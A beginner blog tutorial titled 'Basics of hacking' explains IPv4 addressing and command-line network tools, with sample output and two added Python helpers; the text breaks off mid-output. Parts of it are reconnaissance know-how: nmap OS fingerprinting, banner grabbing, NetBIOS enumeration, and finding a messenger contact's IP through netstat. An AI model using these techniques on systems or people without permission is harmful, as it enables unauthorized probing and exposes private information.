Monday, August 4, 2008

Basics of hacking (everything about IPs):

Hello friends, I'm posting this tutorial on IPs for all the beginners. Read it and enjoy. It's tough but damn good. Don't forget to reply, guys.

This is a tutorial that covers the basics of the Internet Protocol: what an IP address is, and the command-line tools used to find, resolve and query addresses.

What this tutorial covers:

1. What is an IP address?
2. How do I find my own IP?
3. How do I find out what organization owns an IP?
4. How do I find out which IP addresses are connected to me?
5. How do I find out what operating system a host is running?
6. How do I find out the IP of my messenger buddies?
7. How do I find out what ports and services are open on an IP?
8. How do I find out if an IP is reachable?
9. How do I find out the NetBIOS name from an IP?
10. How do I find out who is logged into a remote Windows system?
11. How do I find out the IP address from mail I have received?

1. What is an IP address?
An IP (Internet Protocol) address, in the version 4 scheme covered here, is a 32-bit number assigned to each device (technically called a host) connected to the Internet.
It is the address to which data destined for your computer is sent. It consists of 4 octets. Each octet is 8 bits and has a range from 0 to 255.
(Every IP address on the Internet was traditionally sectioned off into classes from class A to class E, depending on the range of the first octet, but I won't go into that here.)
Here is an example of a typical IP address (taken from 203.0.113.0/24, a range reserved for documentation, so it belongs to nobody):

203.0.113.77
|   | |   |
|   | |   +--> 4th octet (8 bits, 0 to 255)
|   | +------> 3rd octet (8 bits, 0 to 255)
|   +--------> 2nd octet (8 bits, 0 to 255)
+------------> 1st octet (8 bits, 0 to 255)

Each octet is separated by a dot. I said earlier that an IP address is a 32-bit number.
There are 4 octets, each of 8 bits, so 8 bits + 8 bits + 8 bits + 8 bits = 32 bits.

An IP address usually also has a host name, which is read from right to left, most general part first:

gnzl-as50-67.eatel.net
|            |     |
|            |     +--> top-level domain (.net, originally for network providers)
|            +--------> the domain of the ISP (Internet service provider), here eatel
+---------------------> the name of this particular host; "gnzl" stands for Gonzales, Louisiana, where the machine is located

Host names can also end in a country-code suffix (for example gnzl-as50-67.eatel.net.uk), indicating which country they are registered in. Examples:
.jp = Japan
.uk = United Kingdom
.nl = Netherlands
.it = Italy
.ru = Russia
.fr = France
.eg = Egypt
.in = India

2. How do I find my own IP?
Because the IP address your ISP's DHCP server hands you may not always be the same, it is handy to be able to quickly find out what your IP is.
Most of the time on a LAN the DHCP server will try to hand a machine the same IP its MAC address received the last time it requested an address, but not always.
To find out your host's IP and other useful information, use these commands. (If you sit behind a NAT router, they show your private LAN address, not the public address the rest of the Internet sees.)

Windows 9x/Me:

Use the "winipcfg" command; this brings up a GUI dialog with all the info you need.

Windows NT/2000/XP and later:

Use the "ipconfig" command.

C:\>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : se-libg-adrian1
Primary DNS Suffix . . . . . . . : ads.mydomain.edu
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : ads.mydomain.edu
mydomains.edu
mydomain.edu

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : mydomains.edu
Description . . . . . . . . . . . : 3Com 3C920 Integrated Fast Ethernet
Controller (3C905C-TX Compatible)
Physical Address. . . . . . . . . : 00-B0-D0-74-A8-A4
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.26.29
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 192.168.16.100
DHCP Server . . . . . . . . . . . : 192.168.30.254
DNS Servers . . . . . . . . . . . : 192.168.20.1
192.168.25.1
192.168.30.1
129.79.1.1
129.79.5.100
Primary WINS Server . . . . . . . : 192.168.30.254
Secondary WINS Server . . . . . . : 192.168.30.253
Lease Obtained. . . . . . . . . . : Saturday, February 02, 2002 12:03:14 PM
Lease Expires . . . . . . . . . . : Sunday, February 03, 2002 12:03:14 PM

C:\>

Notice that this gives you all sorts of networking information, including your IP, subnet mask, gateway, MAC address, DNS servers and host name.

Linux/Unix:

Use the "ifconfig" command to find the IP of the box (on current Linux distributions ifconfig may not be installed; "ip addr show" gives the same information).

bash-2.04$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:C0:F0:31:9F:10
inet addr:192.168.30.130 Bcast:192.168.31.255 Mask:255.255.240.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:21353979 errors:2 dropped:0 overruns:0 frame:2
TX packets:20342701 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:11 Base address:0xde00

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2234607 errors:0 dropped:0 overruns:0 frame:0
TX packets:2234607 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

bash-2.04$

If you have SSH'd or telnetted into the box and want to find the IP you are connecting from, use the "finger" (or "who") command with no parameters; the last column shows where each session came from.

bash-2.04$ finger
Login Name Tty Idle Login Time Office Office Phone
adrian Adrian Crenshaw pts/3 Feb 2 14:57 (192.168.26.29)
root root pts/0 1:53 Jan 28 17:25 (tux:2)
root root pts/1 4d Jan 25 14:57
root root pts/2 8d Jan 25 14:57 (tux:2)
bash-2.04$
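
The octet arithmetic behind the addresses and masks shown above, as an added example that is not part of the original tutorial: it packs four octets into the 32-bit number the text describes, rejects impossible octets, and derives the network and broadcast address from a subnet mask. The sample values are the ones from the ipconfig output (192.168.26.29, mask 255.255.240.0, gateway 192.168.16.100); the standard library is only used to cross-check the hand-rolled result.

```python
# Added example (not part of the original tutorial): IPv4 octet arithmetic
# done by hand and cross-checked against the standard library. Sample values
# are taken from the ipconfig output earlier on this page.
import ipaddress


def dotted_to_int(addr: str) -> int:
    """Pack four decimal octets into one 32-bit integer.

    Rejects anything that is not exactly four octets in the range 0..255,
    so an impossible value such as 207.144.262.77 is caught here."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError(f"{addr!r}: expected 4 octets, got {len(parts)}")
    value = 0
    for p in parts:
        if not p.isdigit() or int(p) > 255:
            raise ValueError(f"{addr!r}: octet {p!r} is not in 0..255")
        value = (value << 8) | int(p)      # each octet contributes 8 bits
    return value


def int_to_dotted(value: int) -> str:
    """Inverse of dotted_to_int: peel off the four 8-bit groups, high first."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def is_valid_ipv4(addr: str) -> bool:
    try:
        dotted_to_int(addr)
        return True
    except ValueError:
        return False


def subnet_info(addr: str, mask: str) -> dict:
    """Network, broadcast and usable host range for addr/mask."""
    a, m = dotted_to_int(addr), dotted_to_int(mask)
    prefix = bin(m).count("1")
    # A real netmask is a run of 1 bits followed by 0 bits.
    if m != (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF:
        raise ValueError(f"{mask!r} is not a contiguous netmask")
    network = a & m
    broadcast = network | (~m & 0xFFFFFFFF)
    return {
        "prefix": prefix,
        "network": int_to_dotted(network),
        "broadcast": int_to_dotted(broadcast),
        "first_host": int_to_dotted(network + 1),
        "last_host": int_to_dotted(broadcast - 1),
        "usable_hosts": (1 << (32 - prefix)) - 2,
    }


def same_subnet(a: str, b: str, mask: str) -> bool:
    """True when a and b share the network bits selected by mask."""
    m = dotted_to_int(mask)
    return (dotted_to_int(a) & m) == (dotted_to_int(b) & m)


if __name__ == "__main__":
    info = subnet_info("192.168.26.29", "255.255.240.0")
    print(info)                                   # network 192.168.16.0, broadcast 192.168.31.255
    # the default gateway has to be on the same subnet as the host
    print(same_subnet("192.168.26.29", "192.168.16.100", "255.255.240.0"))  # True
    print(is_valid_ipv4("207.144.262.77"))        # False: 262 does not fit in 8 bits
    net = ipaddress.ip_network("192.168.26.29/255.255.240.0", strict=False)
    assert str(net.network_address) == info["network"]
    assert str(net.broadcast_address) == info["broadcast"]
```

The /20 mask from the ipconfig output is why 192.168.26.29, its gateway 192.168.16.100 and its DHCP server 192.168.30.254 are all on one link even though their third octets differ.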

3. How do I find out what organization owns an IP?
First you need the IP. Pinging a host name resolves it to an address (nslookup or dig does the same without sending any packets to the target). Here I've pinged www.jotti.org, which shows its IP to be 62.194.194.181. To find out which organization that address is registered to, look it up in the regional Internet registry's whois database, e.g. "whois 62.194.194.181" on Unix or the web whois at ARIN, RIPE, APNIC, LACNIC or AFRINIC; the record lists the netblock, the owning organization and an abuse contact.

C:\Documents and Settings\Cyber_saint>ping www.jotti.org

Pinging www.jotti.org [62.194.194.181] with 32 bytes of data:

Reply from 62.194.194.181: bytes=32 time=429ms TTL=249
Reply from 62.194.194.181: bytes=32 time=429ms TTL=249
Reply from 62.194.194.181: bytes=32 time=430ms TTL=249
Reply from 62.194.194.181: bytes=32 time=428ms TTL=249

Ping statistics for 62.194.194.181:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 428ms, Maximum = 430ms, Average = 429ms

4. How do I find out which IP addresses are connected to me?
Run netstat -n. The local address is your IP (and port) and the foreign address is the IP (and port) at the remote end of each connection.
C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED

There is a good tool from Sysinternals that makes this easier, called TCPView; it also shows which process owns each connection.

5. How do I find out what operating system a host is running?

The easiest way to find this out is with the "nmap" utility (www.insecure.org/nmap/). The -O option needs raw sockets, so run it as root on Unix or as Administrator on Windows:

[root@tux adrian]# nmap -O tux.mydomains.edu

or

C:\>nmap -O tux.mydomains.edu

Starting nmap V. 2.54BETA26 ( www.insecure.org/nmap/ )
Adding open port 22/tcp
Adding open port 1024/tcp
Adding open port 25/tcp
Adding open port 80/tcp
Adding open port 110/tcp
Adding open port 993/tcp
Adding open port 6002/tcp
Adding open port 5902/tcp
Adding open port 111/tcp
Adding open port 443/tcp
Adding open port 21/tcp
Adding open port 995/tcp
Adding open port 23/tcp
Adding open port 143/tcp
Adding open port 139/tcp
Adding open port 515/tcp
Interesting ports on tux.mydomains.edu (192.168.30.130):
(The 1532 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop-3
111/tcp open sunrpc
139/tcp open netbios-ssn
143/tcp open imap2
443/tcp open https
515/tcp open printer
993/tcp open imaps
995/tcp open pop3s
1024/tcp open kdm
5902/tcp open vnc-2
6002/tcp open X11:2

Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 9.033 days (since Fri Jan 25 14:55:20 2002)

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
[root@tux adrian]#


Notice the "Remote operating system guess" line, which indicates the likely OS. Be careful about using tools like nmap:
the site you are targeting may give your local admin a call asking why you are scanning their site, and in many places scanning systems you do not own or have permission to test is illegal.
Also make sure your copy of nmap is up to date so it has the newest OS fingerprints; the version I used in the above example is quite old (current versions also offer -sV for service version detection).

You can also sometimes find out by using the "What's that site running?" CGI at Netcraft,
which does a banner grab for you.

Telnetting to the host (port 23) and reading the login banner may give you some info:

Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686
login:


If they only have port 80 open you can telnet to that port, hit Enter twice and observe the headers (the empty request provokes an error reply, but that reply still carries the Server header):

[root@tux adrian]# telnet orangutan.mydomains.edu 80
Trying 192.168.28.32...
Connected to orangutan.mydomains.edu.
Escape character is '^]'.


HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sun, 03 Feb 2002 20:51:47 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></head><body>The parameter is incorrect.</body></html>
Connection closed by foreign host.
[root@tux adrian]#

This technique is known as "banner grabbing". Keep in mind that an administrator can change or remove the Server header, so treat it as a hint rather than proof.

6. How do I find out the IP of my messenger buddies?
You can find out the IP address of your buddies only if they are directly connected to you. Normally everything passes through the messenger service's servers, so the only IP you see is the server's. A direct connection is made when you send a file or when a webcam or voice session is on.

YOU------> MSN SERVER/YAHOO SERVER------>OTHER PERSON

During a file transfer or webcam or voice

YOU------>OTHER PERSON

To find the IP, run netstat -n at your command prompt:

C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED

Now send something, a file or a picture, and while the transfer is running (or after establishing a direct voice or webcam session) view the connections again:

C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED
TCP 211.124.228.98:6891 198.51.100.78:1337 ESTABLISHED

There is a new connection that has been established, and its foreign IP address is 198.51.100.78 (an address from the documentation range is used here). The connections to port 1863 are to the messenger servers themselves, not to your buddy.

It is better to use TCPView for this one, as you can watch the connections of each process separately.
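
Picking out the new peer can be scripted instead of done by eye. As an added example that is not part of the original tutorial, the following parses two `netstat -n` snapshots, reports the connections that appeared in the second one, and tags each as a messenger server, a direct peer, or an impossible address. Both snapshots are constructed from the output on this page; the new peer is written with a documentation address, 198.51.100.78.

```python
# Added example (not from the original tutorial): diff two `netstat -n`
# snapshots to pick out a new direct peer. Snapshots are constructed from
# the output on this page; the new peer uses a documentation address.
import re
from typing import List

SNAPSHOT_BEFORE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    211.124.228.98:1138    64.4.13.69:1863        ESTABLISHED
  TCP    211.124.228.98:1150    64.4.12.190:1863       ESTABLISHED
  TCP    211.124.228.98:6891    12.90.50.93:1978       ESTABLISHED
"""
SNAPSHOT_AFTER = SNAPSHOT_BEFORE + (
    "  TCP    211.124.228.98:6891    198.51.100.78:1337     ESTABLISHED\n"
)

# Ports that belong to the messenger service itself rather than to a buddy.
SERVICE_PORTS = {1863: "MSN Messenger server", 5050: "Yahoo Messenger server"}

LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<faddr>\S+):(?P<fport>\d+|\*)(?:\s+(?P<state>\S+))?\s*$"
)


def parse_netstat(text: str) -> List[dict]:
    """Turn the connection lines of `netstat -n` output into dicts. Header and
    blank lines are skipped because they do not start with TCP/UDP."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row["lport"] = int(row["lport"])
        row["fport"] = None if row["fport"] == "*" else int(row["fport"])
        rows.append(row)
    return rows


def valid_ipv4(addr: str) -> bool:
    parts = addr.split(".")
    return len(parts) == 4 and all(p.isdigit() and int(p) <= 255 for p in parts)


def classify(row: dict) -> str:
    if not valid_ipv4(row["faddr"]):
        return "not a valid IPv4 address (an octet is outside 0..255)"
    if row["fport"] in SERVICE_PORTS:
        return SERVICE_PORTS[row["fport"]]
    return "direct peer (the buddy you are transferring with)"


def new_peers(before: str, after: str) -> List[dict]:
    """Connections present in `after` but not in `before`, each tagged with
    what the foreign endpoint most likely is."""
    seen = {(r["proto"], r["faddr"], r["fport"]) for r in parse_netstat(before)}
    found = []
    for row in parse_netstat(after):
        if (row["proto"], row["faddr"], row["fport"]) not in seen:
            row["note"] = classify(row)
            found.append(row)
    return found


if __name__ == "__main__":
    for peer in new_peers(SNAPSHOT_BEFORE, SNAPSHOT_AFTER):
        print(f'{peer["faddr"]}:{peer["fport"]}  {peer["note"]}')
```

To use it live, capture `netstat -n` before and during the transfer and feed the two texts to new_peers(); the Windows-only TCPView does the same interactively.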

7. How do I find out what ports and services are open on an IP?

There are loads of port scanners available on the net; I recommend SuperScan (Foundstone) on Windows, or nmap as shown above. To see which services your own machine is talking to, run netstat without -n, which resolves the IP addresses and port numbers to names:

C:\>netstat

Active Connections

Proto Local Address Foreign Address State
TCP se-sscs-cv112b7:1370 se-cser-fs01.mydomains.edu:netbios-ssn ESTABLISHED
TCP se-sscs-cv112b7:1469 ntemail1-tr.mydomains.state.edu:1078 ESTABLISHED
TCP se-sscs-cv112b7:1473 ntemail1-tr.mydomains.state.edu:1091 ESTABLISHED
TCP se-sscs-cv112b7:1495 ntemail1-tr.mydomains.state.edu:1078 ESTABLISHED
TCP se-sscs-cv112b7:1499 ntemail1-tr.mydomains.state.edu:1091 ESTABLISHED
TCP se-sscs-cv112b7:1631 tux.mydomains.edu:telnet ESTABLISHED
TCP se-sscs-cv112b7:1690 bl-uits-adsdc01.ads.mydomain.edu:microsoft-ds TIME_WAIT
TCP se-sscs-cv112b7:1692 se-cser-app1.mydomains.edu:microsoft-ds ESTABLISHED
TCP se-sscs-cv112b7:1694 bl-uits-adsdc01.ads.mydomain.edu:microsoft-ds TIME_WAIT
TCP se-sscs-cv112b7:1699 homepages1.mydomains.edu:netbios-ssn TIME_WAIT

For better information, such as which binary has a port open, use a tool like Fport (on Windows XP and later, "netstat -anob" run as Administrator shows the same process-to-port mapping):

C:\>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
1572 inetinfo -> 25 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1572 inetinfo -> 80 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
1572 inetinfo -> 443 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 445 TCP
1108 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
1572 inetinfo -> 1043 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon -> 1056 TCP \??\C:\WINDOWS\system32\winlogon.exe
4 System -> 1135 TCP
2436 OUTLOOK -> 1162 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1169 TCP
2436 OUTLOOK -> 1176 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1232 firefox -> 1219 TCP C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox -> 1220 TCP C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK -> 1221 TCP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1390 TCP
4 System -> 1451 TCP
4 System -> 1456 TCP
1232 firefox -> 1602 TCP C:\Program Files\Mozilla Firefox\firefox.exe
4 System -> 1634 TCP
0 System -> 1635 TCP
1108 svchost -> 3389 TCP C:\WINDOWS\System32\svchost.exe
1296 -> 5000 TCP
264 WCESCOMM -> 5679 TCP C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE

1572 inetinfo -> 135 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
2436 OUTLOOK -> 137 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 138 UDP
1572 inetinfo -> 445 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost -> 500 UDP C:\WINDOWS\system32\svchost.exe
1572 inetinfo -> 1026 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System -> 1027 UDP
1108 svchost -> 1028 UDP C:\WINDOWS\System32\svchost.exe
1572 inetinfo -> 1049 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon -> 1051 UDP \??\C:\WINDOWS\system32\winlogon.exe
4 System -> 1165 UDP
2436 OUTLOOK -> 1558 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 1900 UDP
1232 firefox -> 1900 UDP C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK -> 2967 UDP C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System -> 3456 UDP


C:\>

Or Netport:

C:\>netport
NetPort v1.1 - A Visual Log Product
Copyright 2004 by Softgears Company
http://www.softgears.com


Pid Process Port Proto Foreign Address Path
1572 inetinfo 25 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
1572 inetinfo 80 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
1008 svchost 135 TCP: LISTENING C:\WINDOWS\system32\svchost.exe
1572 inetinfo 443 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
4 System 445 TCP: LISTENING
1108 svchost 1025 TCP: LISTENING C:\WINDOWS\System32\svchost.exe
1572 inetinfo 1043 TCP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon 1056 TCP: LISTENING \??\C:\WINDOWS\system32\winlogon.exe
4 System 1135 TCP: LISTENING
2436 OUTLOOK 1162 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1169 TCP: LISTENING
2436 OUTLOOK 1176 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1232 firefox 1220 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
2436 OUTLOOK 1221 TCP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1451 TCP: LISTENING
4 System 1456 TCP: LISTENING
1232 firefox 1602 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
1108 svchost 3389 TCP: LISTENING C:\WINDOWS\System32\svchost.exe
1296 System 5000 TCP: LISTENING
264 WCESCOMM 5679 TCP: LISTENING C:\Program Files\Microsoft ActiveSync\WCESCOMM.EXE
1232 firefox 1219 TCP: LISTENING C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox 1219 TCP: ESTABLISHED 127.0.0.1:1220 C:\Program Files\Mozilla Firefox\firefox.exe
1232 firefox 1220 TCP: ESTABLISHED 127.0.0.1:1219 C:\Program Files\Mozilla Firefox\firefox.exe
4 System 139 TCP: LISTENING
776 winlogon 1056 TCP: CLOSE_WAIT 134.68.220.157:389 \??\C:\WINDOWS\system32\winlogon.exe
2436 OUTLOOK 1162 TCP: ESTABLISHED 134.68.220.155:1025 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1169 TCP: ESTABLISHED 192.168.28.33:445
2436 OUTLOOK 1176 TCP: ESTABLISHED 129.79.1.40:1222 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
2436 OUTLOOK 1221 TCP: ESTABLISHED 129.79.1.214:1249 C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
4 System 1390 TCP: LISTENING
4 System 1390 TCP: ESTABLISHED 192.168.30.154:139
4 System 1456 TCP: ESTABLISHED 129.79.6.3:445
1232 firefox 1602 TCP: ESTABLISHED 64.233.167.104:80 C:\Program Files\Mozilla Firefox\firefox.exe
4 System 1634 TCP: LISTENING
4 System 1634 TCP: ESTABLISHED 192.168.30.34:139
1008 svchost 135 UDP: LISTENING C:\WINDOWS\system32\svchost.exe
4 System 445 UDP: LISTENING
836 lsass 500 UDP: LISTENING C:\WINDOWS\system32\lsass.exe
1264 System 1026 UDP: LISTENING
1264 System 1027 UDP: LISTENING
836 lsass 1028 UDP: LISTENING C:\WINDOWS\system32\lsass.exe
1572 inetinfo 1049 UDP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
776 winlogon 1051 UDP: LISTENING \??\C:\WINDOWS\system32\winlogon.exe
2436 OUTLOOK 1165 UDP: LISTENING C:\Program Files\Microsoft Office\OFFICE11\OUTLOOK.EXE
1640 Rtvscan 2967 UDP: LISTENING C:\Program Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe
1572 inetinfo 3456 UDP: LISTENING C:\WINDOWS\System32\inetsrv\inetinfo.exe
4064 FRONTPG 1558 UDP: LISTENING C:\PROGRA~1\MICROS~2\Office10\FRONTPG.EXE
1296 System 1900 UDP: LISTENING
4 System 137 UDP: LISTENING
4 System 138 UDP: LISTENING
1296 System 1900 UDP: LISTENING

On Linux:

Use the "lsof -i" command (or "netstat -tulpn" / "ss -tulpn", which also show the owning process):

[root@balrog root]# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhclient 467 root 4u IPv4 777 UDP *:bootpc
portmap 533 rpc 3u IPv4 898 UDP *:sunrpc
portmap 533 rpc 4u IPv4 901 TCP *:sunrpc (LISTEN)
rpc.statd 552 rpcuser 4u IPv4 972 UDP *:32768
rpc.statd 552 rpcuser 5u IPv4 939 UDP *:728
rpc.statd 552 rpcuser 6u IPv4 975 TCP *:32768 (LISTEN)
sshd 642 root 3u IPv4 1287 TCP *:ssh (LISTEN)
xinetd 657 root 5u IPv4 1313 TCP localhost.localdomain:32769 (LISTEN)
sendmail 682 root 4u IPv4 1377 TCP localhost.localdomain:smtp (LISTEN)
httpd 712 root 3u IPv4 1422 TCP *:http (LISTEN)
httpd 712 root 4u IPv4 1423 TCP *:https (LISTEN)
sshd 8498 root 4u IPv4 323188 TCP balrog.ius.edu:ssh->winxpe:1644 (ESTABLISHED)
httpd 31094 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31094 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31095 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31095 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31096 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31096 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31097 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31097 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31098 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31098 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31099 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31099 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31100 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31100 apache 4u IPv4 1423 TCP *:https (LISTEN)
httpd 31101 apache 3u IPv4 1422 TCP *:http (LISTEN)
httpd 31101 apache 4u IPv4 1423 TCP *:https (LISTEN)
[root@balrog root]#

8. How do I find out if an IP is reachable?

If the host is not blocking ICMP echo requests (type 8, code 0), try the "ping" command; it works from any Unix-like OS and from Windows.

Up:

C:\>ping 192.168.30.130

Pinging 192.168.30.130 with 32 bytes of data:

Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255
Reply from 192.168.30.130: bytes=32 time<10ms TTL=255

Not up:

C:\>ping 192.168.1.162

Pinging 192.168.1.162 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.1.162:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

Note that "Request timed out" does not prove the host is down: many hosts and firewalls silently drop echo requests. If ping fails, try a TCP probe to a port the host is likely to have open, for example "nmap -Pn -p 22,80,443 <host>", before concluding that it is unreachable.

9. How do I find out the NetBIOS name from an IP?

On Windows (note the capital -A, which takes an IP address; lower-case -a takes a NetBIOS name):

C:\>nbtstat -A 192.168.22.68

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SE-SSCS-CV112C8<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C8<03> UNIQUE Registered
SE-SSCS-CV112C8<20> UNIQUE Registered
ADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered


MAC Address = 00-04-76-39-B6-D9

C:\>

On Unix (if you have the nbtstat tool installed; Samba's nmblookup -S does the same job):
[root@tux /root]# nbtstat 192.168.22.68
received data:
A2 48 84 00 00 00 00 01 00 00 00 00 20 43 4B 41 .H.......... CKA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21 AAAAAAAAAAAAA..!
00 01 00 00 00 00 00 9B 06 53 45 2D 53 53 43 53 .........SE-SSCS
2D 43 56 31 31 32 43 38 00 44 00 41 44 53 20 20 -CV112C8.D.ADS
20 20 20 20 20 20 20 20 20 20 00 C4 00 53 45 2D ...SE-
53 53 43 53 2D 43 56 31 31 32 43 38 03 44 00 53 SSCS-CV112C8.D.S
45 2D 53 53 43 53 2D 43 56 31 31 32 43 38 20 44 E-SSCS-CV112C8 D
00 41 44 53 20 20 20 20 20 20 20 20 20 20 20 20 .ADS
1E C4 00 41 44 52 49 41 4E 20 20 20 20 20 20 20 ...ADRIAN
20 20 03 44 00 00 04 76 39 B6 D9 00 00 00 00 00 .D...v9.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 8C .....
6 names in response
SE-SSCS-CV112C8<0x00> Unique Workstation Service
ADS <0x00> Group Domain Name
SE-SSCS-CV112C8<0x03> Unique Messenger Service
SE-SSCS-CV112C8<0x20> Unique File Server Service
ADS <0x1e> Group Potential Master Browser
ADRIAN <0x03> Unique Messenger Service
[root@tux /root]#

The reverse (NetBIOS name to IP) can be done with:

On Windows:

C:\>nbtstat -a se-sscs-cv112c8

Local Area Connection:
Node IpAddress: [192.168.22.68] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SE-SSCS-CV112C8<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C8<03> UNIQUE Registered
